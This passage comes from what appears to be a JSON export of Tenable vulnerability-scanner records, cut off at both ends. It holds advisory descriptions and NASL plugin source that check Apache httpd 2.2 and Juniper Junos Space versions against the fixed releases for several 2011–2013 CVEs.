or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache>2.*<2.2.22\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:47:24", "description": "According to its self-reported version number, the remote Junos Space version is prior to 13.1R1.6. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple Vulnerabilities related to the included Apache HTTP server. (CVE-2011-3368, CVE-2011-4317, CVE-2012-0053)\n\n - A cross-site scripting flaw within the web interface that allows a remote attacker, with a specially crafted request, to access sensitive information.\n (CVE-2013-5095)\n\n - A flaw exists with the access control implementation that allows a remote attacker with read-only privileges to change the device's configuration. (CVE-2013-5096)\n\n - An information disclosure flaw exists that allows a remote attacker to obtain a list of users and their hashed passwords. 
(CVE-2013-5097)", "cvss3": {"score": null, "vector": null}, "published": "2014-12-22T00:00:00", "type": "nessus", "title": "Juniper Junos Space 11.1x < 13.1R1.6 Multiple Vulnerabilities (JSA10585)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-4317", "CVE-2012-0053", "CVE-2013-5095", "CVE-2013-5096", "CVE-2013-5097"], "modified": "2018-07-12T00:00:00", "cpe": ["cpe:/a:juniper:junos_space"], "id": "JUNIPER_SPACE_JSA10585.NASL", "href": "https://www.tenable.com/plugins/nessus/80192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80192);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\n \"CVE-2011-3368\",\n \"CVE-2011-4317\",\n \"CVE-2012-0053\",\n \"CVE-2013-5095\",\n \"CVE-2013-5096\",\n \"CVE-2013-5097\"\n );\n script_bugtraq_id(\n 49957,\n 50802,\n 51706,\n 61791,\n 61794,\n 61795\n );\n\n script_name(english:\"Juniper Junos Space 11.1x < 13.1R1.6 Multiple Vulnerabilities (JSA10585)\");\n script_summary(english:\"Checks the version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote Junos Space\nversion is prior to 13.1R1.6. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - Multiple Vulnerabilities related to the included Apache\n HTTP server. (CVE-2011-3368, CVE-2011-4317,\n CVE-2012-0053)\n\n - A cross-site scripting flaw within the web interface\n that allows a remote attacker, with a specially crafted\n request, to access sensitive information.\n (CVE-2013-5095)\n\n - A flaw exists with the access control implementation\n that allows a remote attacker with read-only privileges\n to change the device's configuration. 
(CVE-2013-5096)\n\n - An information disclosure flaw exists that allows a\n remote attacker to obtain a list of users and their\n hashed passwords. (CVE-2013-5097)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10585\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Junos Space 13.1R1.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_space\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Junos_Space/version\");\n\n exit(0);\n}\n\ninclude(\"junos.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit('Host/Junos_Space/version');\n\ncheck_junos_space(ver:ver, fix:'13.1R1.6', severity:SECURITY_WARNING, min:'11.1', xss:TRUE);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:58:59", "description": "Versions of Apache 2.2 earlier than 2.2.22 are potentially affected by the following vulnerabilities :\n\n - When 
configured as a reverse proxy, improper use of the RewriteRule and ProxyPassMatch directives could cause the web server to proxy requests to arbitrary hosts. This could allow a remote attacker to indirectly send requests to intranet servers. (CVE-2011-3368, CVE-2011-4317)\n\n - A heap-based buffer overflow exists when mod_setenvif module is enabled and both a maliciously crafted 'SetEnvIf' directive and a maliciously crafted HTTP request header are used. (CVE-2011-3607)\n\n - A format string handling error can allow the server to be crashed via maliciously crafted cookies. (CVE-2012-0021)\n\n - An error exists in 'scoreboard.c' that can allow local attackers to crash the server during shutdown. (CVE-2012-0031)\n\n - An error exists in 'protocol.c' that can allow 'HTTPOnly' cookies to be exposed to attackers through the malicious use of either long or malformed HTTP headers. (CVE-2012-0053)\n\n - An error in the mod_proxy_ajp module when used to connect to a backend server that takes an overly long time to respond could lead to a temporary denial of service. (CVE-2012-4557)", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2012-02-06T00:00:00", "type": "nessus", "title": "Apache 2.2 < 2.2.22 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0021", "CVE-2011-3368", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2011-4317", "CVE-2012-4557"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apache:http_server:2.2:*:*:*:*:*:*:*"], "id": "6302.PRM", "href": "https://www.tenable.com/plugins/nnm/6302", "sourceData": "Binary data 6302.prm", "cvss": {"score": 5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:59:01", "description": "According to its banner, the version of Apache 2.2.x installed on the remote host is prior to 2.2.22. 
It is, therefore, potentially affected by the following vulnerabilities :\n\n - When configured as a reverse proxy, improper use of the RewriteRule and ProxyPassMatch directives could cause the web server to proxy requests to arbitrary hosts.\n This could allow a remote attacker to indirectly send requests to intranet servers.\n (CVE-2011-3368, CVE-2011-4317)\n\n - A heap-based buffer overflow exists when mod_setenvif module is enabled and both a maliciously crafted 'SetEnvIf' directive and a maliciously crafted HTTP request header are used. (CVE-2011-3607)\n\n - A format string handling error can allow the server to be crashed via maliciously crafted cookies.\n (CVE-2012-0021)\n\n - An error exists in 'scoreboard.c' that can allow local attackers to crash the server during shutdown.\n (CVE-2012-0031)\n\n - An error exists in 'protocol.c' that can allow 'HTTPOnly' cookies to be exposed to attackers through the malicious use of either long or malformed HTTP headers. (CVE-2012-0053)\n\n - An error in the mod_proxy_ajp module when used to connect to a backend server that takes an overly long time to respond could lead to a temporary denial of service. 
(CVE-2012-4557)\n\nNote that Nessus did not actually test for these flaws, but instead has relied on the version in the server's banner.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2012-02-02T00:00:00", "type": "nessus", "title": "Apache 2.2.x < 2.2.22 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317", "CVE-2012-0021", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-4557"], "modified": "2018-06-29T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_2_2_22.NASL", "href": "https://www.tenable.com/plugins/nessus/57791", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57791);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/06/29 12:01:03\");\n\n script_cve_id(\n \"CVE-2011-3368\",\n \"CVE-2011-3607\",\n \"CVE-2011-4317\",\n \"CVE-2012-0021\",\n \"CVE-2012-0031\",\n \"CVE-2012-0053\",\n \"CVE-2012-4557\"\n );\n script_bugtraq_id(49957, 50494, 50802, 51407, 51705, 51706, 56753);\n\n script_name(english:\"Apache 2.2.x < 2.2.22 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version in Server response header.\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apache 2.2.x installed on the\nremote host is prior to 2.2.22. 
It is, therefore, potentially affected\nby the following vulnerabilities :\n\n - When configured as a reverse proxy, improper use of the\n RewriteRule and ProxyPassMatch directives could cause\n the web server to proxy requests to arbitrary hosts.\n This could allow a remote attacker to indirectly send\n requests to intranet servers.\n (CVE-2011-3368, CVE-2011-4317)\n\n - A heap-based buffer overflow exists when mod_setenvif\n module is enabled and both a maliciously crafted \n 'SetEnvIf' directive and a maliciously crafted HTTP \n request header are used. (CVE-2011-3607)\n\n - A format string handling error can allow the server to\n be crashed via maliciously crafted cookies.\n (CVE-2012-0021)\n\n - An error exists in 'scoreboard.c' that can allow local\n attackers to crash the server during shutdown.\n (CVE-2012-0031)\n\n - An error exists in 'protocol.c' that can allow \n 'HTTPOnly' cookies to be exposed to attackers through\n the malicious use of either long or malformed HTTP\n headers. (CVE-2012-0053)\n\n - An error in the mod_proxy_ajp module when used to \n connect to a backend server that takes an overly long \n time to respond could lead to a temporary denial of \n service. 
(CVE-2012-4557)\n\nNote that Nessus did not actually test for these flaws, but instead \nhas relied on the version in the server's banner.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://archive.apache.org/dist/httpd/CHANGES_2.2.22\");\n script_set_attribute(attribute:\"see_also\", value:\"http://httpd.apache.org/security/vulnerabilities_22.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apache version 2.2.22 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"apache_http_version.nasl\");\n script_require_keys(\"installed_sw/Apache\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"install_func.inc\");\n\nget_install_count(app_name:\"Apache\", exit_if_zero:TRUE);\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:\"Apache\", 
port:port, exit_if_unknown_ver:TRUE);\n\n# Check if we could get a version first, then check if it was\n# backported\nversion = get_kb_item_or_exit('www/apache/'+port+'/version', exit_code:1);\nbackported = get_kb_item_or_exit('www/apache/'+port+'/backported', exit_code:1);\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"Apache\");\nsource = get_kb_item_or_exit('www/apache/'+port+'/source', exit_code:1);\n\n# Check if the version looks like either ServerTokens Major/Minor\n# was used\nif (version =~ '^2(\\\\.2)?$') exit(1, \"The banner from the Apache server listening on port \"+port+\" - \"+source+\" - is not granular enough to make a determination.\");\n\nfixed_ver = '2.2.22';\nif (version =~ '^2\\\\.2' && ver_compare(ver:version, fix:fixed_ver) == -1)\n{\n if (report_verbosity > 0)\n {\n report = \n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver + '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Apache\", port, install[\"version\"]);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:12:11", "description": "Updated httpd packages that fix multiple security issues and one bug are now available for JBoss Enterprise Web Server 1.0.2 for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server ('httpd') is the namesake project of The Apache Software Foundation.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. 
In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal Server Error' response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. (CVE-2011-3348)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA NULL pointer dereference flaw was found in the httpd mod_log_config module. In configurations where cookie logging is enabled, a remote attacker could use this flaw to crash the httpd child process via an HTTP request with a malformed Cookie header. (CVE-2012-0021)\n\nA flaw was found in the way httpd handled child process status information. 
A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nRed Hat would like to thank Context Information Security for reporting the CVE-2011-3368 issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1329 update introduced a regression in the way httpd handled certain Range HTTP header values. This update corrects this regression. (BZ#749071)\n\nAll users of JBoss Enterprise Web Server 1.0.2 should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, users must restart the httpd service for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : JBoss Web Server (RHSA-2012:0542)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368", "CVE-2011-3607", "CVE-2012-0021", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-devel", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-tools", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2012-0542.NASL", "href": "https://www.tenable.com/plugins/nessus/78923", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0542. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78923);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(49616, 49957, 50494, 51407, 51705, 51706);\n script_xref(name:\"RHSA\", value:\"2012:0542\");\n\n script_name(english:\"RHEL 5 / 6 : JBoss Web Server (RHSA-2012:0542)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix multiple security issues and one bug\nare now available for JBoss Enterprise Web Server 1.0.2 for Red Hat\nEnterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server ('httpd') is the namesake project of The Apache\nSoftware Foundation.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. 
(CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed. (CVE-2011-3348)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA NULL pointer dereference flaw was found in the httpd mod_log_config\nmodule. In configurations where cookie logging is enabled, a remote\nattacker could use this flaw to crash the httpd child process via an\nHTTP request with a malformed Cookie header. (CVE-2012-0021)\n\nA flaw was found in the way httpd handled child process status\ninformation. 
A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nRed Hat would like to thank Context Information Security for reporting\nthe CVE-2011-3368 issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1329 update\nintroduced a regression in the way httpd handled certain Range HTTP\nheader values. This update corrects this regression. (BZ#749071)\n\nAll users of JBoss Enterprise Web Server 1.0.2 should upgrade to these\nupdated packages, which contain backported patches to correct these\nissues. After installing the updated packages, users must restart the\nhttpd service for the update to take effect.\"\n );\n # https://rhn.redhat.com/errata/R